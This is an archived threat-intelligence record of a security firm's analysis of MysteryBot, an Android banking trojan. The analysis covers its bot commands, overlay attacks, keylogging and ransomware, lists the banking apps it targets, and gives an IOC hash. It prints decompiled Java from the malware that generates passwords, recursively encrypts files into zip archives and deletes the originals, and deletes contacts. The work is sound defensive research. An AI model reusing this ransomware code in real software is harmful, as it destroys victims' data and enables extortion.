{
	"id": "e6d64b14-f930-41d2-b1d5-d7d8099ed51a",
	"created_at": "2026-04-29T08:22:16.211345Z",
	"updated_at": "2026-04-29T10:42:04.028441Z",
	"deleted_at": null,
	"sha1_hash": "71319bf160d787adf23ac2d9fb1a9558e84b058a",
	"title": "MysteryBot; a new Android banking Trojan ready for Android 7 and 8",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 83731,
	"plain_text": "MysteryBot; a new Android banking Trojan ready for Android 7\r\nand 8\r\nPublished: 2024-10-01 · Archived: 2026-04-29 07:42:05 UTC\r\nIntro\r\nWhile processing our daily set of suspicious samples, our detection rule for the Android banking trojan LokiBot\r\nmatched a sample that seemed quite different than LokiBot itself, urging us to take a closer look at it. Looking at\r\nthe bot commands, we first thought that LokiBot had been improved. However, we quickly realized that there is\r\nmore going on: the name of the bot and the name of the panel changed to “MysteryBot”, even the network\r\ncommunication changed.\r\nDuring investigation of its network activity we found out that MysteryBot and LokiBot Android banker are both\r\nrunning on the same C\u0026C server. This quickly brought us to an early conclusion that this newly discovered\r\nMalware is either an update to Lokibot, either another banking trojan developed by the same actor.\r\nTo consolidate evidence, we searched some other sources and found more matches between samples of both\r\nmalware using the same C\u0026C, as visible in following screenshot from Koodous:\r\nMysteryBot linked to LokiBot on Koodous\r\nCapabilities\r\nThis bot has most generic Android banking Trojan functionalities, but seems to be willing to surpass the average.\r\nThe overlay, key logging and ransomware functionalities are novel and are explained in detail in the section here-after. All of the bot commands and respectful features are listed in the table below.\r\n   \r\nCallToNumber Calls a given phone number from the infected device\r\nContacts Gets contact list information (phone number and name of contacts)\r\nDe_Crypt\r\nNo code present, in development (probably decrypts the data / reverses the\r\nransomware process)\r\nForwardCall Forwards incoming calls of the device to another number\r\nGetAlls Shortened for GetAllSms, copies all the SMS messages from the device\r\nGetMail No code present, in development (probably stealing emails from the infected device)\r\nKeylogg Copies and saves keystrokes performed on the infected device\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 1 of 9\n\nResetCallForwarding Stops the forwarding of incoming calls\r\nScreenlock\r\nEncrypts all files in the external storage directory and deletes all contact information\r\non the device\r\nSend_spam Sends a given SMS message to each contact in the contact list of the device\r\nSmsmnd Replaces the default SMS manager on the device, meant for SMS interception\r\nStartApp\r\nNo code present, in development (probably allows to remotely start application on\r\nthe infected device)\r\nUSSD Calls a USSD number from the infected device\r\ndell_sms Deletes all SMS messages on the device\r\nsend_sms Sends a given SMS message to a specific number\r\nThe following screenshot shows the dropdown list that enables the operator to launch specific commands on the\r\nbot:\r\nScreenshot of the interface used to manage the ransomware victims\r\nMysteryBot also embeds a ransomware feature allowing itself to encrypt individually all files in the external\r\nstorage directory, including every sub directory, after which the original files are deleted. The encryption process\r\nputs each file in an individual ZIP archive that is password protected, the password is the same for all ZIP archives\r\nand is generated during runtime. When the encryption process is completed, the user is greeted with a dialog\r\naccusing the victim to have watched pornographic material. To retrieve the password and be able to decrypt the\r\nfiles the user is instructed to e-mail the actor on his e-mail address:\r\ngoogleprotect[at]mail.ru\r\nDuring the analysis of the ransomware functionality, two points of failure came out:\r\nFirstly, the password used during the encryption is only 8 characters long and consists of all characters of\r\nthe Latin alphabet (upper and lower case) combined with numbers. The total amount of characters to pick\r\nfrom is 62, leaving the total possible combinations a total of 62 to the power of 8, which could be brute-forced with the relevant processing power.\r\nSecondly, the ID assigned to each victim can be a number between 0 and 9999. Since there is no\r\nverification of existing ID, it is possible that another victim with the same ID exists in the C2 database,\r\noverwriting the id in the C2 database. Resulting in the impossibility for a older victims with duplicated ID\r\nto recover their files.\r\nThis code snippet shows the process used to generate the password used during the encryption:\r\ngeneratePassword()\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 2 of 9\n\npublic static String generatePassword() {\r\n Random random = new Random();\r\n StringBuilder passwordLength8 = new StringBuilder();\r\n String seed = \"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\r\n for (int i = 0; i \u003c 8; i++) {\r\n int characterLocation = random.nextInt(seed.length());\r\n char currentChar = seed.charAt(characterLocation);\r\n passwordLength8.append(currentChar);\r\n }\r\n return passwordLength8.toString();\r\n}\r\nThis code snippet shows the code that recursively scans directories: scanDirectory()\r\npublic void scanDirectory(File file) {\r\n try {\r\n File\\[\\] fileArray = file.listFiles();\r\n if (fileArray == null) {\r\n return;\r\n }\r\n int amountOfFiles = fileArray.length;\r\n for (int i = 0; i \u003c amountOfFiles; i++) {\r\n File currentFile = fileArray\\[i\\];\r\n if (currentFile.isDirectory()) {\r\n this.scanDirectory(currentFile);\r\n } else {\r\n this.deleteFileEncryptInZip(currentFile);\r\n }\r\n }\r\n } catch (Exception ex) {\r\n ex.printStackTrace();\r\n }\r\n}\r\nThis code snippet shows the code used to encrypt a given directory: deleteFileEncryptInZip()\r\npublic String deleteFileEncryptInZip(File file) {\r\n try {\r\n StringBuilder canonicalPath = new StringBuilder().insert(0, file.getCanonicalPath());\r\n canonicalPath.append(\".zip\");\r\n ZipFile zipFile = new ZipFile(canonicalPath.toString());\r\n ArrayList paths = new ArrayList();\r\n paths.add(new File(String.valueOf(file)));\r\n ZipParameters zipParameters = new ZipParameters();\r\n zipParameters.setCompressionMethod(8);\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 3 of 9\n\nzipParameters.setCompressionLevel(5);\r\n zipParameters.setEncryptFiles(true);\r\n zipParameters.setEncryptionMethod(99);\r\n zipParameters.setAesKeyStrength(3);\r\n zipParameters.setPassword(this.password);\r\n zipFile.addFiles(paths, zipParameters);\r\n file.delete();\r\n StringBuilder dblocksPath = new StringBuilder();\r\n dblocksPath.append(Environment.getExternalStorageDirectory());\r\n dblocksPath.append(\"/dblocks.txt\");\r\n BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter(new File(dblocksPath.toString()), true\r\n bufferedWriter.write(\"+1\\\\n\");\r\n bufferedWriter.close();\r\n } catch (Exception ex) {\r\n ex.printStackTrace();\r\n }\r\n return \"\";\r\n}\r\nThis code snippet shows the deletion of all the contacts: deleteContacts()\r\nprivate void deleteContacts() {\r\n ContentResolver contentResolver = this.getContentResolver();\r\n Cursor contacts = contentResolver.query(ContactsContract$Contacts.CONTENT_URI, null, null, null, null);\r\n while (contacts.moveToNext()) {\r\n try {\r\n contentResolver.delete(Uri.withAppendedPath(ContactsContract$Contacts.CONTENT\\ _LOOKUP\\ _URI, co\r\nOverlay targets\r\nThe get_inj_list action retrieves the targeted apps with overlays from the C\u0026C server, note that at the time of\r\nwriting the actor was extending and further developing this overlay action class.\r\nThe list of actual targeted apps is visible hereunder (still under development at the time of writing):\r\nPackage name Related Bank\r\nat.easybank.mbanking Easybank\r\nat.volksbank.volksbankmobile VolksbankBanking\r\nau.com.bankwest.mobile Bankwest\r\nau.com.ingdirect.android INGAustraliaBanking\r\nau.com.nab.mobile NABMobileBanking\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 4 of 9\n\nPackage name Related Bank\r\nau.com.suncorp.SuncorpBank SuncorpBank\r\ncom.IngDirectAndroid INGDirectFrance\r\ncom.advantage.RaiffeisenBank RaiffeisenSmartMobile\r\ncom.akbank.android.apps.akbank_direkt AkbankDirekt\r\ncom.anz.android.gomoney ANZAustralia\r\ncom.aol.mobile.aolapp AOL-News,Mail\u0026Video\r\ncom.axis.mobile AxisMobile-FundTransfer,UPI,Recharge\u0026Payment\r\ncom.bankaustria.android.olb BankAustriaMobileBanking\r\ncom.bankinter.launcher BankinterMóvil\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.bbva.netcash BBVANetcash PT\r\ncom.bendigobank.mobile BendigoBank\r\ncom.boursorama.android.clients BoursoramaBanque\r\ncom.caisseepargne.android.mobilebanking Banque\r\ncom.chase.sig.android ChaseMobile\r\ncom.cibc.android.mobi CIBCMobileBanking®\r\ncom.cic_prod.bad CIC\r\ncom.citibank.mobile.au CitibankAustralia\r\ncom.clairmail.fth FifthThirdMobileBanking\r\ncom.cm_prod.bad CréditMutuel\r\ncom.commbank.netbank CommBank\r\ncom.csam.icici.bank.imobile iMobilebyICICIBank\r\ncom.ebay.gumtree.au Gumtree:Search,Buy\u0026Sell\r\ncom.facebook.katana Facebook\r\ncom.facebook.orca Messenger–TextandVideoChatforFree\r\ncom.finansbank.mobile.cepsube QNBFinansbankCepŞubesi\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 5 of 9\n\nPackage name Related Bank\r\ncom.fullsix.android.labanquepostale.accountaccess LaBanquePostale\r\ncom.garanti.cepsubesi GarantiMobileBanking\r\ncom.getingroup.mobilebanking GetinMobile\r\ncom.grppl.android.shell.CMBlloydsTSB73 LloydsBankMobileBanking\r\ncom.grppl.android.shell.halifax Halifax:thebankingappthatgivesyouextra\r\ncom.htsu.hsbcpersonalbanking HSBCMobileBanking\r\ncom.infonow.bofa BankofAmericaMobileBanking\r\ncom.isis_papyrus.raiffeisen_pay_eyewdg RaiffeisenELBA\r\ncom.konylabs.capitalone CapitalOne®Mobile\r\ncom.konylabs.cbplpat CitiHandlowy\r\ncom.kutxabank.android Kutxabank\r\ncom.macif.mobile.application.android MACIF-Essentielpourmoi\r\ncom.microsoft.office.outlook MicrosoftOutlook\r\ncom.moneybookers.skrillpayments Skrill\r\ncom.moneybookers.skrillpayments.neteller NETELLER\r\ncom.ocito.cdn.activity.creditdunord CréditduNordpourMobile\r\ncom.paypal.android.p2pmobile PayPal\r\ncom.pozitron.iscep İşCep\r\ncom.rsi Ruralvía\r\ncom.sbi.SBIFreedomPlus SBIAnywherePersonal\r\ncom.skype.raider Skype-freeIM\u0026videocalls\r\ncom.snapwork.hdfc HDFCBankMobileBanking\r\ncom.starfinanz.smob.android.sbanking Sparkasse+FinanzenimGriff\r\ncom.starfinanz.smob.android.sfinanzstatus SparkasseIhremobileFiliale\r\ncom.suntrust.mobilebanking SunTrustMobileApp\r\ncom.td TDCanada\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 6 of 9\n\nPackage name Related Bank\r\ncom.tecnocom.cajalaboral BancaMóvilLaboralKutxa\r\ncom.tmobtech.halkbank HalkbankMobil\r\ncom.todo1.mobile BancolombiaAppPersonas\r\ncom.unionbank.ecommerce.mobile.android UnionBankMobileBanking\r\ncom.usaa.mobile.android.usaa USAAMobile\r\ncom.usbank.mobilebanking U.S.Bank\r\ncom.vakifbank.mobile VakıfBankMobilBankacılık\r\ncom.viber.voip ViberMessenger\r\ncom.whatsapp WhatsAppMessenger\r\ncom.yahoo.mobile.client.android.mail YahooMail–StayOrganized\r\ncom.ykb.android YapıKrediMobile\r\ncom.ziraat.ziraatmobil ZiraatMobil\r\nde.comdirect.android comdirectmobileApp\r\nde.commerzbanking.mobil CommerzbankBankingApp\r\nde.consorsbank Consorsbank\r\nde.dkb.portalapp DKB-Banking\r\nde.fiducia.smartphone.android.banking.vr VR-Banking\r\nde.postbank.finanzassistent PostbankFinanzassistent\r\nde.sdvrz.ihb.mobile.app SpardaApp\r\nes.bancopopular.nbmpopular Popular\r\nes.bancosantander.apps Santander\r\nes.cm.android Bankia\r\nes.evobanco.bancamovil EVOBancomóvil\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\neu.eleader.mobilebanking.pekao BankPekao\r\neu.eleader.mobilebanking.pekao.firm PekaoBiznes24\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 7 of 9\n\nPackage name Related Bank\r\neu.eleader.mobilebanking.raiffeisen MobileBank\r\neu.unicreditgroup.hvbapptan HVBMobileB@nking\r\nfr.banquepopulaire.cyberplus BanquePopulaire\r\nfr.creditagricole.androidapp MaBanque\r\nfr.lcl.android.customerarea MesComptes-LCLpourmobile\r\nhr.asseco.android.jimba.mUCI.ro MobileBanking\r\nin.co.bankofbaroda.mpassbook BarodamPassbook\r\nmobi.societegenerale.mobile.lappli AppliSociétéGénérale\r\nmobile.santander.de SantanderMobileBanking\r\nnet.bnpparibas.mescomptes MesComptesBNPParibas\r\norg.banksa.bank BankSAMobileBanking\r\norg.bom.bank BankofMelbourneMobileBanking\r\norg.stgeorge.bank St.GeorgeMobileBanking\r\norg.westpac.bank WestpacMobileBanking\r\npl.bzwbk.bzwbk24 BZWBK24mobile\r\npl.eurobank eurobankmobile\r\npl.ipko.mobile TokeniPKO\r\npl.mbank mBankPL\r\npl.pkobp.iko IKO\r\nro.btrl.mobile BancaTransilvania\r\nsrc.com.idbi IDBIBankGOMobile\r\nwit.android.bcpBankingApp.millenniumPL BankMillennium\r\nConclusion\r\nAlthough certain Android banking malware families such as but not limited to ExoBot 2.5, Anubis II, DiseaseBot\r\nhave been exploring new techniques to perform overlay attacks on Android 7 and 8, it seems that the actor(s)\r\nbehind MysteryBot have successfully implemented a workaround solution and have spent some time on\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 8 of 9\n\ninnovation. The implementation of the overlay attack abuses the Usage Access permission in order to run on all\r\nversion of the Android operating system including the latest Android 7 and 8.\r\nMysteryBot actor(s) did innovate keylogging with this new implementation. Effectively lowering detection rates\r\nand limiting the user interaction required to enable the logger. Indeed, the key logging mechanism is based on\r\ntouch points on the screen instead of using the commonly abused Android Accessibility Service, meaning that it\r\nhas potential to log more than the usually keystrokes. The ransomware also includes a new highly annoying\r\ncapability that deletes the contacts in the contact list of the infected device, something not observed in banking\r\nmalware till now. Next to that, although still in development another function caught our attention, based on the\r\nnaming convention in use, it seems that the function named GetMail is meant to collect email messages from the\r\ninfected device. The enhanced overlay attacks also running on the latest Android versions combined with\r\nadvanced keylogging and the potential under-development features will allow MysteryBot to harvest a broad set\r\nof Personal Identifiable Information in order to perform fraud.\r\nIn the last 6 months we observed that capabilities such as a proxy, keylogging, remote access (RAT), sound\r\nrecording and file uploading have become more and more common; we suspect this trend to only grow in the\r\nfuture. The issue with such functionalities is that besides bypassing security and detection measures, those features\r\nmake threats less targeting but more opportunistic. For example, keylogging, remote access, file upload and sound\r\nrecording allow for advanced information harvesting without specific triggers (information can be stolen and\r\nrecorded even if the victim doesn’t perform online banking). If our expectation of increase in such behavior turns\r\nout to be true, it means that it will become difficult for financial institutions to asses whether or not they are target\r\nby the specific threats and that all infected devices can be source of fraud and espionage.\r\nIOC\r\nPlease note that MysteryBot is still under development at the time of writing and not widely spread.\r\nAdobe Flash Player (install.apps) 334f1efd0b347d54a418d1724d51f8451b7d0bebbd05f648383d05c00726a7ae\r\nSource: https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nhttps://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
	],
	"report_names": [
		"mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html"
	],
	"threat_actors": [],
	"ts_created_at": 1777450936,
	"ts_updated_at": 1777459324,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/71319bf160d787adf23ac2d9fb1a9558e84b058a.pdf",
		"text": "https://archive.orkl.eu/71319bf160d787adf23ac2d9fb1a9558e84b058a.txt",
		"img": "https://archive.orkl.eu/71319bf160d787adf23ac2d9fb1a9558e84b058a.jpg"
	}
}